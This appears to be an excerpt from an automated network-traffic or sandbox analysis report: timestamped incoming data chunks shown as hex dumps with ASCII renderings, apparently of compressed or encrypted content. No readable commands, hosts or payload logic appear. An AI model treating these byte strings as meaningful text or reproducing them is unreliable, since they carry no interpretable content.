                                                                                                                                                    2022-09-29 12:59:14 UTC26183INData Raw: aa 73 91 48 5e da 49 b3 7d 99 41 01 70 1b 8e 1f f6 9d c3 c8 e9 d0 7b 6f 04 28 27 93 21 fe 34 d2 68 3a 3a 48 b2 9e 39 44 42 39 85 5c d6 fc ea 0e 7e e4 2a c8 02 22 b9 02 bc 59 dc ee 9c b9 e8 a8 11 1a f8 5f 63 64 38 49 8c 95 77 b3 2c a2 1c 6e 1d 72 a8 ad 4e 3e 70 d9 a5 7a 88 20 85 8f 69 88 a8 0c 9a 00 e5 04 96 6e 50 51 02 86 f9 a3 ce 85 7b 64 80 60 9c 28 28 22 83 71 6b 43 7a 99 ff 15 1b 1e be b8 46 3f af 62 92 03 91 68 f9 2b 36 51 8f 00 61 58 f8 9b 10 f3 8b e3 10 1f a7 aa 4c 0c 5f 9c 06 75 26 9b 16 91 26 dc f5 04 1b d6 09 3f d3 5b 52 34 78 80 95 f2 85 25 63 ee 81 3e 8d 3d 12 14 42 83 4e cb 19 e5 46 94 98 7b 2e 60 11 38 37 c3 21 57 b5 41 2e 6a 83 3f 62 5d 2c 73 91 e4 8f 93 d1 a7 b2 2b 04 1b 36 c1 d4 db a1 d2 a0 32 43 4e 47 32 6c 09 a9 73 d9 d8 20 de 8d 0a a5
                                                                                                                                                    Data Ascii: sH^I}Ap{o('!4h::H9DB9\~*"Y_cd8Iw,nrN>pz inPQ{d`(("qkCzF?bh+6QaXL_u&&?[R4x%c>=BNF{.`87!WA.j?b],s+62CNG2ls
                                                                                                                                                    2022-09-29 12:59:14 UTC26199INData Raw: 12 ab 12 63 f0 7e 7d 3c fc 7a 61 9d b8 ae 49 b9 d0 94 17 9c 22 c2 0a 58 2b 35 1d e6 5c 87 b3 c7 a0 31 f2 c1 1f 85 98 a3 c0 69 0e ae 6f 43 4f a3 a1 f5 06 d8 7f c4 bb 33 b7 8d ba c3 a4 ea 16 c0 f3 f0 12 b6 e2 d8 9b e0 c0 dd d4 5c ab 77 75 51 e6 ad 1d 1a 95 aa 48 0f 49 a9 16 f7 62 68 64 74 4d 56 65 52 0b 21 42 16 97 a0 22 4d 76 8b 43 8b 55 60 9d c0 ba 84 44 a5 03 c6 c0 15 be 21 69 ab 3d 24 ae 9d 09 7d 5e 54 91 1a 27 37 49 2f 94 c2 4d c6 95 90 90 1f 15 75 7c bc 5c 8e 85 91 c2 59 5c da 79 16 12 2e 13 13 73 1f 5a 1e a7 56 f8 30 be 30 c0 76 4e 3e ef df 66 fe cc cb f4 49 09 93 bd 6d 0f 12 38 aa 24 1a 12 c4 ff 3a 14 9a 7e 41 91 06 65 b0 e7 48 1a 71 45 ba 62 ec f9 64 09 e0 c2 f7 f8 27 3c 5a 36 b7 49 05 d4 7f 95 d2 0e d6 73 2c 04 74 8a b3 17 45 3b b7 85 6d 2d ef ed
                                                                                                                                                    Data Ascii: c~}<zaI"X+5\1ioCO3\wuQHIbhdtMVeR!B"MvCU`D!i=$}^T'7I/Mu|\Y\y.sZV00vN>fIm8$:~AeHqEbd'<Z6Is,tE;m-
                                                                                                                                                    2022-09-29 12:59:14 UTC26215INData Raw: 53 e1 d4 dd c8 a0 2c 1e cf e7 ec 46 ce b4 95 1e 00 40 95 b6 2c 69 2c 66 3e 63 3c 53 f1 c8 77 a1 e7 db 39 aa 57 b6 ad 62 10 69 f7 4c ab 56 66 a0 4c d2 49 cd 3a ba 47 ae 86 33 67 2c 82 23 24 e4 db 8f 61 82 90 31 cc a6 16 14 42 b1 88 bd 8c cb 76 e8 e9 a8 dd 51 16 aa 9f a1 33 66 fe 97 20 4d 8a ca 02 8b 1e 1c 01 1b 17 1a 5e 18 d6 4d d0 d4 49 cd c2 20 1e 05 31 74 19 b1 41 c4 1b 44 0e 4e fa 5c e3 34 21 f7 cd e4 b7 57 5d 30 be 66 a0 93 21 ed 4f 77 5d 4e 6a ce 58 b4 b3 f6 a0 e9 b1 dd 2d fb 88 a8 8f 4e 27 6d b0 41 73 26 15 50 ad 7d 96 a4 9a 3d bd cd 3c 7b ae f0 49 58 d2 3f 8d f3 c9 69 05 70 82 7f a2 f2 53 8f 28 e9 06 a5 7d aa cb 8f 07 0a fc 1c 61 88 8c f6 8a 6f 2a a4 df 66 92 a8 df bc 7b fa 3f 39 d6 b6 e3 f1 43 28 88 9b 1e 5c d6 99 50 8b e1 94 aa 71 d9 06 d8 97 3c
                                                                                                                                                    Data Ascii: S,F@,i,f>c<Sw9WbiLVfLI:G3g,#$a1BvQ3f M^MI 1tADN\4!W]0f!Ow]NjX-N'mAs&P}=<{IX?ipS(}ao*f{?9C(\Pq<
                                                                                                                                                    2022-09-29 12:59:14 UTC26231INData Raw: e5 82 c2 c3 cc 0c 19 94 f0 e1 fa 38 5c 3d 3c ca 6b 8d 15 68 52 22 de 51 f8 4a c2 87 a9 14 c6 27 af 26 ca 4c 3e de a5 f2 67 49 e1 24 37 49 67 98 72 00 8f ac a7 f8 8d af c2 2e 43 62 76 04 ec 9e fc da 0c f6 e2 eb 78 97 37 29 b1 c1 3b f0 3b 0a 23 4f fb 99 20 3c 7b c1 f6 87 2b d5 5e 37 1e 83 45 74 a4 8b 76 9e 39 bd 37 91 59 69 69 5e b2 1e 6b 6c c4 08 0f 28 c5 03 96 83 9d 26 9f ec 0f f2 6a 54 ce de 0d 08 81 4f d3 3b 6f 4f 00 51 4c 83 9e 19 a0 47 13 bc 39 ac 54 ce d2 73 c8 f9 47 7e 4f e4 25 70 4f 4e 6a b4 34 19 a4 b8 9b af 50 a3 08 d5 68 48 51 96 d1 c2 28 9e 2f 41 e9 9a ab da c7 8a 6d ae a0 b5 15 66 c0 66 22 da a2 02 2a 0d 55 99 33 9c 0b 95 92 57 e8 32 6f 4a 8e 71 96 61 56 b4 6f e4 4b 69 ba cc f8 3a 84 34 91 d0 1d a2 90 95 49 b1 bb d7 e2 0a 00 69 a8 94 13 1f aa
                                                                                                                                                    Data Ascii: 8\=<khR"QJ'&L>gI$7Igr.Cbvx7);;#O <{+^7Etv97Yii^kl(&jTO;oOQLG9TsG~O%pONj4PhHQ(/Amff"*U3W2oJqaVoKi:4Ii
                                                                                                                                                    2022-09-29 12:59:14 UTC26247INData Raw: f2 03 df 89 16 94 e4 1e 84 62 2e 0f 53 31 9b 3b 82 94 8d e0 df 5f 1b 19 55 87 7b 9e 4f d8 cb 43 7c 1c 8e 86 d3 e4 a4 c6 a1 36 da 4f 9e 01 cc ad 92 47 44 b9 16 82 8c c5 0c b5 41 76 1d 0a 13 8b ee 0b 3e f8 e3 5f 7d 3f 60 44 f7 fe 7a f7 13 54 24 2b 7c 04 66 6a 58 db cb a3 aa 87 3c 63 f8 cd fa ec 44 a4 75 05 4f 02 2e 50 d2 6e 3e e6 92 90 9c 5a 5a b1 90 a0 6a b6 0c cb e2 d3 1c 89 98 a5 8b 11 ad ad 4b 63 cb 1d 5d 9c c2 6f a8 af f0 eb e5 7a 49 96 ed 73 d1 1b 9e c6 bc d8 fb e3 e5 07 96 10 b1 d6 d6 c8 b9 3d f3 b5 ad ab 1f 53 be f6 4f ed cb 70 73 55 4e 8d a5 53 97 ca 76 4e 1d dd e3 11 9e ff 5d 0e a5 84 73 bb e1 e4 8f 9d 77 f0 31 32 69 55 bf 5c 76 e5 c9 90 80 5d 5c 19 8d b2 1b 7c 80 32 21 7c 1c d1 da cf cd c4 6c 22 ca 11 d8 8b 57 a3 70 76 2e 9e 9a 74 24 d2 b8 c9 07
                                                                                                                                                    Data Ascii: b.S1;_U{OC|6OGDAv>_}?`DzT$+|fjX<cDuO.Pn>ZZjKc]ozIs=SOpsUNSvN]sw12iU\v]\|2!|l"Wpv.t$
                                                                                                                                                    2022-09-29 12:59:14 UTC26263INData Raw: 33 9d ba 5d e6 a1 ef 2f 65 cc 4f a0 55 3e 1c 04 e3 7f a0 d1 fc cb dd a8 d8 c8 df 2a a3 97 b8 8d b6 1a 6b 6d 40 cb 55 19 55 b3 d7 21 54 b2 1d 0d 71 2f 58 83 34 3a 96 0f fb 14 83 63 2e 18 ab b2 7b b6 70 d0 67 f0 90 de 29 4c b8 7e 8b f7 42 f4 eb 4a 1b 41 92 91 af d5 0a d9 11 da e4 b8 a2 6d 64 5a 38 bd bf 08 dc fc e2 ab 91 53 39 c8 02 7c a6 0c 43 d6 a6 d7 e9 3a 6f 2a f6 84 a9 58 b5 55 b1 d1 03 42 fc 9c fc 1e ea 4c ab 9f 02 a3 66 e9 33 b6 71 6b 32 6b 86 1f 55 1d c5 86 0f 6f fc ff e6 ce 4f c8 04 b1 37 5a da 02 06 92 c2 9c 02 bd ac d0 19 26 80 81 7b d4 48 ed 73 de fd 29 63 fd 7c 21 0a 98 f2 9f 10 89 a0 1f 72 f8 ae ad 8f 4b 16 d1 48 03 35 03 4c 37 93 32 03 cf be 3e c3 69 fe 5e bd 60 97 d7 7a df 50 ff 45 37 04 70 c1 36 cb 24 22 b0 d1 ea 3d 41 a0 a1 0d 47 34 12 e7
                                                                                                                                                    Data Ascii: 3]/eOU>*km@UU!Tq/X4:c.{pg)L~BJAmdZ8S9|C:o*XUBLf3qk2kUoO7Z&{Hs)c|!rKH5L72>i^`zPE7p6$"=AG4
                                                                                                                                                    2022-09-29 12:59:14 UTC26279INData Raw: 66 bd 57 f8 de b8 f1 e6 e2 99 9e eb 04 7e 21 29 ae a8 ad 1a 98 30 10 b9 fd 1b 0b f4 21 dc af 98 6b 45 c9 32 cb 83 ad e4 4d 2a 8f 35 28 7b da 0d a9 2c 28 9c 4b f5 46 3b ec f4 f4 4a 1f 69 7a 87 2d d8 7e 5e 38 72 45 fd b1 86 f6 35 de 98 7a 07 70 33 86 47 64 98 ca 35 74 42 3b 91 1d 92 f7 20 d7 e8 67 62 ec e2 d0 f1 05 0a e8 e4 ca ba ba 2d 8f e6 b5 e5 7e fc df 26 d3 0a 7b ed 50 69 5e 82 a1 71 37 f9 ec 4b 43 0c 9f e7 b1 82 96 5a 05 1e 3a 4b 87 ec 20 c9 de 93 ba a6 86 3a 8e 64 40 fd 88 35 a2 2d 1d 5f fc 61 86 20 82 8a 69 44 13 67 ee 88 40 e1 7c ab 8a 87 74 e3 31 46 4c c1 6f 80 5f e5 31 a5 b4 c4 40 be 5d e7 6a 65 44 39 8a 1a 6d 01 67 45 53 8a 31 0c a9 6e 7e da a9 c4 b4 47 87 55 4c ee 26 8d b4 a9 c4 1d 85 c2 eb d1 be 3b a2 68 73 55 fe a9 31 8b 10 a2 c7 28 af c4 6e
                                                                                                                                                    Data Ascii: fW~!)0!kE2M*5({,(KF;Jiz-~^8rE5zp3Gd5tB; gb-~&{Pi^q7KCZ:K :d@5-_a iDg@|t1FLo_1@]jeD9mgES1n~GUL&;hsU1(n
                                                                                                                                                    2022-09-29 12:59:14 UTC26295INData Raw: b2 06 30 06 76 9e 4d 6d ce 38 13 83 af ee f9 c5 40 5a 9d 84 01 7e f9 cd 53 ce 08 51 59 80 40 08 e4 c8 f8 b5 91 7c b4 d5 03 06 34 93 65 af 2e a1 dd 9d 26 d7 ea 15 cb f1 3a 34 fc 4b 07 f1 55 f7 ad 7a 12 21 14 70 01 b9 8a 0d c5 8c 21 7d 09 e8 09 fd 07 d4 5f 13 6a 3b d6 5a c7 e5 9a e9 81 4f 63 31 81 c1 db 1e 02 90 c9 ee 4e 41 9e 24 fe 78 62 4f 84 a1 49 8b c4 75 c3 24 03 5f c9 93 0d c1 1d f4 95 0b f8 a5 81 ab d8 80 9c a9 de 22 c5 25 c3 28 11 59 49 d0 02 0e 6b ed 47 93 54 9f 49 c4 d7 3f d5 5a 89 21 07 8f f6 2f 80 9f 18 6a ce 3e 16 9e 28 62 c6 fe ad 4e 7a 72 ad eb fd 7c f2 bb 85 9a 1b b6 ca 65 d6 dd ba a7 7e 52 dd 5f 41 8d bd e6 80 9c 96 0e d6 fe c8 cc 8a 5b 5d c4 ac 48 da 3c 39 34 54 97 5b ef aa 39 3a 59 7c b0 26 5e 54 9b 76 83 b4 45 e7 e7 89 7e 49 7c 6b 5e dc
                                                                                                                                                    Data Ascii: 0vMm8@Z~SQY@|4e.&:4KUz!p!}_j;ZOc1NA$xbOIu$_"%(YIkGTI?Z!/j>(bNzr|e~R_A[]H<94T[9:Y|&^TvE~I|k^
                                                                                                                                                    2022-09-29 12:59:14 UTC26311INData Raw: 6f 2f 16 d5 2a e1 45 0d c2 d4 91 c0 d7 63 57 5f 3f 5c 5b a6 31 63 00 90 fb 98 48 d7 19 53 ae 0a 04 7f 77 a6 e9 68 ec 64 e9 c9 fc f2 9c b8 10 ae 49 ad 7f 52 85 ac 86 cd 6e 35 48 6a 73 59 91 d2 98 2b e3 72 9e b0 3f 88 5d 73 ea cb 7f 80 89 ba 34 4c 82 1b 92 e3 76 53 d2 50 5c 15 ec 40 08 5f ec 0d b6 97 e8 5c b1 8d 5a ff f5 2a ee 78 44 19 07 17 c6 3f 36 51 c1 0b cc e5 c4 06 8e 1d 83 e5 e5 c6 54 a8 27 0e cd f6 fb 21 6d d9 3d 1a 0b f7 3c ba 16 67 b7 14 5d 03 0e eb 5c 92 48 ee 59 2d 1c c5 36 5c 9d 9b 01 0c bd 1d 9f 98 2c ee be af ca 88 40 de 12 e1 3a 0c b3 30 08 71 2d 4f 5e 09 27 f1 66 bf eb 43 4b 64 c2 96 a6 c0 83 1d 77 96 b8 57 d0 84 c1 2c 38 bd 2f f5 19 0d 90 47 f7 4b 13 7c 33 56 2b ac 00 c0 94 6b a0 41 18 72 9b c0 6e 7b 93 03 dc 1c 6a 2e c5 e2 8f dc 04 8b 90
                                                                                                                                                    Data Ascii: o/*EcW_?\[1cHSwhdIRn5HjsY+r?]s4LvSP\@_\Z*xD?6QT'!m=<g]\HY-6\,@:0q-O^'fCKdwW,8/GK|3V+kArn{j.
                                                                                                                                                    2022-09-29 12:59:14 UTC26327INData Raw: d8 0f 18 c3 fe 6f f7 cb c0 db 96 75 04 ac 2a e5 99 6e 52 ae 18 b4 f4 bd 1b ee 15 59 cf 9f d2 7f 77 a7 e8 a7 7d 65 65 6c 5d b7 03 9e fb c8 aa e5 bf 0c ac 12 d9 ea 98 d4 a6 5b ba a8 ec 19 e7 8a ee 91 c7 e4 91 4e 87 5d 27 56 ef bf c0 da 34 23 80 49 ea c9 77 02 46 56 9d 2e 74 7d 94 7a 94 95 e5 5a 97 7f dd 00 ea 91 f4 21 46 8b be e7 09 b9 6e c5 fe c4 fe 72 f4 3a 5e a3 2e 24 7c 3c 3e 1b df da 95 43 09 6e d4 c4 d1 26 cd 26 3a 17 62 c5 27 b9 47 8e d1 18 64 fc 2f 53 f3 73 c6 de 3c 18 f8 4b 3e 24 46 a4 9c c8 05 bc 3d 3f 41 68 67 92 5f 5d 9f 5d 5c cb d7 e9 de 0f 55 6c 11 59 31 85 f8 e4 a6 43 da 92 c7 2d ae 25 d6 2c 45 62 56 35 52 ab 55 54 3f 2b f5 2a f4 1c e5 15 66 f0 e2 44 63 62 12 0f d0 51 72 3c 4b 5b b6 65 f8 0f 3b cd ea 7f a3 7b 75 3b b4 0d 1b 30 e7 a0 ab 64 f7
                                                                                                                                                    Data Ascii: ou*nRYw}eel][N]'V4#IwFV.t}zZ!Fnr:^.$|<>Cn&&:b'Gd/Ss<K>$F=?Ahg_]]\UlY1C-%,EbV5RUT?+*fDcbQr<K[e;{u;0d
                                                                                                                                                    2022-09-29 12:59:14 UTC26343INData Raw: 70 5b d6 35 a5 a8 a8 bb 10 ea 43 69 3d ea f6 45 67 ec 17 b6 be 6d 16 60 00 19 80 34 17 2c 8f bb 52 f8 1c ef 49 65 d8 b9 a3 88 76 68 f3 43 10 5b b9 b8 58 60 bd 86 57 e3 32 b3 ae bb 02 08 2c 5a 40 13 5d 6a 57 83 73 85 3f 9a 1d 8a f7 10 96 4d b8 15 3d 80 cc 5e bd b6 79 d0 31 c1 a3 9f 83 52 0a fe a2 76 14 21 89 df 6a 7c 7e d0 2b c0 04 4e f5 5d 8b fd 45 06 4b f4 b8 af d9 c5 88 13 bb a5 5d 74 85 0d 54 10 74 18 f8 46 56 47 06 70 9b d9 dd 82 3e d3 f6 79 76 53 11 e7 df cb d1 75 c1 44 5e 25 07 3b c9 fd 4f 64 73 d3 b8 7b c3 c7 ef e2 26 f1 2c 47 33 b3 41 26 0a 5c ca 7c d9 e3 52 12 82 81 59 03 c2 24 19 1d a9 69 31 b7 f3 88 bd 66 f8 9a 85 86 ee f6 91 10 c0 11 1f f9 a5 63 22 67 5f 1d fb ae b9 51 99 26 f7 c9 75 23 ce 07 a1 fb e2 77 63 b4 7a 9f e8 83 86 61 e3 1f 8c 0a 4b
                                                                                                                                                    Data Ascii: p[5Ci=Egm`4,RIevhC[X`W2,Z@]jWs?M=^y1Rv!j|~+N]EK]tTtFVGp>yvSuD^%;Ods{&,G3A&\|RY$i1fc"g_Q&u#wczaK
                                                                                                                                                    2022-09-29 12:59:14 UTC26359INData Raw: 3d 6f f5 01 ef 10 24 5b e3 11 6d 6f 07 70 38 d8 b5 80 3b 2b 72 a2 eb 6b 56 8c 2b 27 c2 0a d3 bb 67 e5 df b6 1c 39 0d 5d e8 24 2e d9 3e 02 e6 8d 01 5c ce de 38 4f 10 82 8a fb 74 f8 71 06 f5 10 e9 7f 47 5f dd e9 7d 35 fe 51 1b bf 31 42 fd ad 58 ce d7 8b 7d ae 07 09 1f e8 1b d5 a8 7d f0 10 6d fc 00 81 b4 c4 24 10 92 f4 b8 bd d8 e3 23 2b c0 ea 1f d3 96 5d 24 52 34 63 c0 0f 50 74 7e cd 36 b2 80 34 f4 92 8a f2 4f 79 3a d4 ce 9b 8b 4b 89 5c be 4d d9 cc c7 07 ff 8d 51 8e c1 f1 bf d6 03 7d d9 45 78 4d 8f 93 76 a6 ab d2 7e 7f 12 70 f3 7f 90 a9 53 69 88 79 25 e2 36 cf 12 58 0f 49 38 ea ee a6 27 68 77 0d ce 3d 2e b6 b3 db ab 3d 72 58 a3 30 df 2f ca 4f 80 a5 36 d0 30 1d 16 fd b1 85 b9 4a 2c d2 63 a3 a0 b4 be f9 90 32 db d6 da bf d2 a0 99 86 1d 02 78 1c be f6 6a 86 2a
                                                                                                                                                    Data Ascii: =o$[mop8;+rkV+'g9]$.>\8OtqG_}5Q1BX}}m$#+]$R4cPt~64Oy:K\MQ}ExMv~pSiy%6XI8'hw=.=rX0/O60J,c2xj*
                                                                                                                                                    2022-09-29 12:59:14 UTC26375INData Raw: 0d ca a4 de 75 04 e9 c3 8b 5a f1 bf 56 7b c8 c3 d1 91 69 a4 38 21 87 2c 00 68 b2 3a c4 1b 05 16 d5 b5 cb 22 70 98 17 ba c8 2b 15 c1 d5 ce 27 d8 b0 f1 ad f2 63 70 07 be 63 ab 58 a2 ab 2f a7 dd ad 89 32 8d 93 04 7b 4e 63 64 c9 e2 13 d5 c9 4c 66 85 08 cd b6 c1 88 73 09 7b cc 8d 84 32 ce 17 24 fd 0c 47 ec 2c 80 32 ca 8b d5 d8 f9 94 60 20 cc 21 5a b2 af 4b 69 c5 6e 61 f1 3c 7e 16 59 c0 9f 7d 88 ec 5b fe 02 61 e7 cf 31 7f f3 99 e9 da ef 5c 6c 45 d5 1d 5a 81 7f b4 42 ed 09 50 9c 16 f6 18 bf e5 a0 85 ea 85 88 6d 06 28 ce 28 65 72 91 27 1a a6 03 b5 44 f1 85 a8 05 ed c9 f6 0f 50 78 e5 3d 9a 71 68 7b 9e 23 72 e1 04 6e 8e 95 95 a3 82 a4 a4 50 ab a5 9f fe 98 bb 54 32 3d a0 c5 67 b3 50 06 11 0a 09 10 af ea 18 6b 6e b9 dc e5 4b 4c 86 fa 62 ac 98 ce 08 c0 c3 f0 cc cc 39
                                                                                                                                                    Data Ascii: uZV{i8!,h:"p+'cpcX/2{NcdLfs{2$G,2` !ZKina<~Y}[a1\lEZBPm((er'DPx=qh{#rnPT2=gPknKLb9
                                                                                                                                                    2022-09-29 12:59:14 UTC26391INData Raw: 08 2f b9 ed 99 e4 da 8d c2 f2 58 0f c9 42 1d 29 49 93 0d 5e 5b e5 6e de da f2 d2 35 19 ce a7 1c 97 1e dc c8 a2 2e 70 89 87 e9 e3 89 88 d4 a2 47 30 2c 91 7b d8 ec d2 b4 24 ad 16 6a b7 81 9d f4 9a 1b 92 49 e8 06 6e 84 5a 22 c6 7b 6b a5 0b e5 80 22 f9 3c 05 05 d7 b2 e0 25 c0 6e 01 33 76 35 27 61 88 e4 e2 ec 25 fc f6 fe 60 fa 92 18 8d e4 d3 59 35 3c 88 fc fa 33 da 48 f5 07 6e 5b dc 37 07 f5 e1 a7 a8 d7 68 89 60 d7 cc b9 e4 67 8f 98 06 0b d9 32 4f c1 19 e2 20 fe 2f cd 54 89 e7 b5 30 fc 43 56 33 99 12 25 8d f2 55 4f 7e 88 e6 52 71 b7 a3 46 9e 1d 35 84 17 5b e4 c7 bd 70 2f 52 43 cc f7 a7 8e 48 87 80 c5 37 6a 74 ba c9 93 f4 f1 be 4e ab 8a 02 f4 e5 fe 8e d6 09 e2 43 57 c4 91 64 70 54 c5 7b 50 a7 a0 78 85 7a f9 c6 dc ce 27 ad 89 e0 86 08 30 a8 1c 41 be 32 3d aa 75
                                                                                                                                                    Data Ascii: /XB)I^[n5.pG0,{$jInZ"{k"<%n3v5'a%`Y5<3Hn[7h`g2O /T0CV3%UO~RqF5[p/RCH7jtNCWdpT{Pxz'0A2=u
                                                                                                                                                    2022-09-29 12:59:14 UTC26407INData Raw: 50 08 6f 34 f7 a8 52 d7 fb e2 e8 6a 5a 5b 1f 33 3b 36 2c c2 45 ff e0 89 aa b4 f4 da c2 4c fe 74 99 ea 14 7b 75 14 c5 94 02 3d f8 52 d9 8d f3 0d f6 c2 85 95 f0 fd 0b 9b ff d2 81 49 02 a4 54 b3 69 0c 2d ad ea b2 ae b7 02 ca 59 86 9e 63 2e 67 ad 4b e5 ab ea 9c a4 ae 9b 52 c2 73 a9 bf c2 a3 76 e2 a2 e7 dc 94 97 c0 91 69 0c 41 8f d5 10 cc 07 dc 0e 68 a7 15 c2 3f 40 a3 98 20 10 c8 e7 e3 47 6d 8b f3 5c ec 1a 47 e3 2a ba f6 b7 ab 41 52 ef c2 e4 0e 00 f2 56 1f a7 08 46 a2 d5 e8 a9 e9 38 81 90 ae 05 a6 6a d4 98 ac 1c f6 de f7 8e 51 06 44 59 3c 94 b0 a4 4a e2 e2 1f 16 db 60 64 9c 7d 43 78 a1 2b d3 d6 71 81 80 55 0b 3f 2d 78 fc ec 94 75 0b dd 37 fe 28 27 5f 08 d4 e8 56 93 42 38 37 84 aa 8d 95 16 03 71 26 f8 e4 3c 48 9c 3f a1 ec b8 c6 fd df bb fc 02 db 3f d3 80 21 35
                                                                                                                                                    Data Ascii: Po4RjZ[3;6,ELt{u=RITi-Yc.gKRsviAh?@ Gm\G*ARVF8jQDY<J`d}Cx+qU?-xu7('_VB87q&<H??!5
                                                                                                                                                    2022-09-29 12:59:14 UTC26423INData Raw: 80 21 fe c5 e3 51 eb 49 c6 33 78 d8 3f cb 74 cd 5b 45 b6 87 7d ac a0 79 9b 5b f0 e2 47 1a db 7e 44 da 9c d2 7c c9 33 08 bb 00 7c 04 6e 7c 46 42 8c 0a b7 13 ac 7a 1b 14 56 b2 f1 12 c6 54 cf 8f 15 95 47 1a 0e 4f 7e d7 ee f2 5d 97 db 25 d0 a9 6d 33 4e 1b 27 5c 2d 64 d8 3a 25 55 ad 8d 24 9c 1d 06 98 e4 74 f2 b2 aa f4 14 26 02 bf d7 dc b9 fa 82 72 89 54 5f f9 ef 92 6a 73 c5 2a 94 91 78 32 53 b7 c5 2f c6 1a b2 17 2e 62 6d 5d 0b a2 91 3c 21 e7 e1 dc 4e fa 20 cb 69 99 7d 18 0c 03 9f 7e 7f 7e 44 ce d2 d1 c1 5c 6a a9 86 99 7b ac cd 6f f3 d9 45 a7 a5 27 10 e0 8b a3 6e 0b 98 8d 0f 95 9e d7 ec fe ba 2a 9e 32 22 31 d6 0a 55 a5 b7 a0 65 71 73 e9 3d c5 73 00 3e 3c 36 bf 0c 8d 49 8a 83 89 21 55 4e bf 1e 30 d4 99 ee e9 38 69 c8 15 58 c3 d9 6d 04 db ff a1 d2 30 6a 79 e7 cc
                                                                                                                                                    Data Ascii: !QI3x?t[E}y[G~D|3|n|FBzVTGO~]%m3N'\-d:%U$t&rT_js*x2S/.bm]<!N i}~~D\j{oE'n*2"1Ueqs=s><6I!UN08iXm0jy
                                                                                                                                                    2022-09-29 12:59:14 UTC26439INData Raw: a4 45 18 a4 02 b5 a5 dd 7a 88 5e c7 c1 52 fb b2 c8 d8 03 6e dd be 69 90 94 10 0f 76 16 ea 91 06 23 74 7c 37 da 60 9d 06 5b 72 0a 2b 07 b3 a7 d4 88 a7 2a 2a 2c 33 47 b4 e4 4d 6f e5 0c 3f 07 93 41 1b b8 05 b0 1e e8 17 34 ab a6 2f 39 b8 a4 46 9d c7 36 b9 02 b9 1c 93 06 52 32 5c 8a ad de 5e c7 ba 4c 7a 1f 29 96 81 3c e5 08 fc 69 dd 33 7d db 55 2f 8c 1e a9 0d 23 17 12 b3 c5 8d 56 c3 64 f9 e6 2d 13 8c d5 74 bd 71 69 5f 57 4d cb 57 72 42 6d 22 4c ec da ad 5e 80 6f bd 4e f9 1f fb dd 29 81 ac f0 0e 71 30 6e fd 57 bd 7a 43 c5 f0 8c f6 40 de f2 d6 ec 6f 56 15 43 88 de d1 6f 1c bb 9e e9 6f 4f ea b4 32 43 b7 12 05 17 a4 71 c7 9d 39 93 2f b4 b4 b9 0d aa 7e d4 09 3f c1 2e d2 6f f6 78 32 65 e5 88 2d ef 7c 33 c9 2c 8c b2 f1 15 1d 9e a9 e3 9a 84 52 3a 1d 27 5a 71 ef c0 a0
                                                                                                                                                    Data Ascii: Ez^Rniv#t|7`[r+**,3GMo?A4/9F6R2\^Lz)<i3}U/#Vd-tqi_WMWrBm"L^oN)q0nWzC@oVCooO2Cq9/~?.ox2e-|3,R:'Zq
                                                                                                                                                    2022-09-29 12:59:14 UTC26455INData Raw: d3 73 9f 95 2e fd b8 db f8 73 c9 98 b2 d9 13 85 69 20 ca 0d d8 33 67 d4 68 65 77 dc 26 13 7b 8f 71 75 64 39 31 a5 6e 6e 53 21 03 24 92 9c 9b 44 2c a6 42 a7 f6 c4 a9 d1 fb 90 4c ef 0c 93 14 b4 ef 5a de 1d 37 d2 82 d3 f0 c9 8f 2e 50 f3 39 9f 15 96 08 99 0c cf 7b f4 6b 38 bd 83 66 3b ea 89 33 da 4d f9 83 0a 3a 85 6d c3 99 c9 26 57 d5 a1 05 fc 9c 7d 1d 9f 47 69 e3 ed e1 97 a2 bc 6a be 27 c5 99 76 4a c0 98 aa 3a 32 ba 9f 6e e3 dd 50 9a 41 2e 2a 3e 88 96 43 31 84 1b 7f 57 b4 06 26 f7 68 3b 57 b0 55 81 75 b8 26 a2 cb f5 72 75 ce 77 c6 f3 43 d7 8d 82 dd b7 16 0e ec 18 36 bc 3b 5d 65 07 15 a8 0d bf df c9 ff 5c 1d c1 4a 83 d1 67 63 76 a3 87 25 60 9a d5 2b 82 37 de 01 ee e4 e9 c7 6d 49 9c e8 04 3c 8c 1d b4 b6 7f da e6 5b e9 16 20 9a 15 93 c7 a9 96 1d c3 89 2a ff 25
                                                                                                                                                    Data Ascii: s.si 3ghew&{qud91nnS!$D,BLZ7.P9{k8f;3M:m&W}Gij'vJ:2nPA.*>C1W&h;WUu&ruwC6;]e\Jgcv%`+7mI<[ *%
                                                                                                                                                    2022-09-29 12:59:14 UTC26471INData Raw: b8 b5 0d 6c 16 8d 0d f1 b7 c8 43 ed a7 e9 b4 d3 a8 30 85 f3 6f 9d d1 b6 dd 9e 50 b9 a6 58 bb 49 65 3e b3 cf 25 78 28 b5 cf f2 6b d5 74 9d cb dd 57 6a a5 87 45 19 20 44 0e a2 6c 6a 49 9e 12 5c af 3e 55 89 a2 74 a3 82 a8 a3 0f a2 56 8a 74 79 c5 ac cb 19 6c 36 79 1d 2a 1e 74 1d bf f7 92 9f 3d d5 08 ba 50 b0 2c 3a 9d c8 9b 7a fd a2 a3 1f 53 4c 30 66 46 ae 54 b3 3c 8f 4f 6e 2c 94 56 25 5f fa a2 69 2e 18 7e 20 f5 26 e0 2f 9f 4b 72 da 8b 32 a6 cb 15 68 ea 45 25 aa aa 25 fe 45 64 85 39 49 69 cd 50 e7 e8 19 c5 6b 75 c3 00 c7 b7 c3 f3 42 5c ad a1 9f a0 be bd f2 9e 60 52 6f 77 7e 2e 95 63 dd b2 62 f3 53 3f 8a 33 16 47 96 56 ed 9a f8 20 6e db fa 01 30 2e 9f d9 95 56 71 c8 d6 ca 2e de 36 65 8f 11 c1 33 4c ff ca bc 3c 9b 13 45 56 29 e7 74 a2 aa c2 a2 ab 61 6a 44 85 31
                                                                                                                                                    Data Ascii: lC0oPXIe>%x(ktWjE DljI\>UtVtyl6y*t=P,:zSL0fFT<On,V%_i.~ &/Kr2hE%%Ed9IiPkuB\`Row~.cbS?3GV n0.Vq.6e3L<EV)tajD1
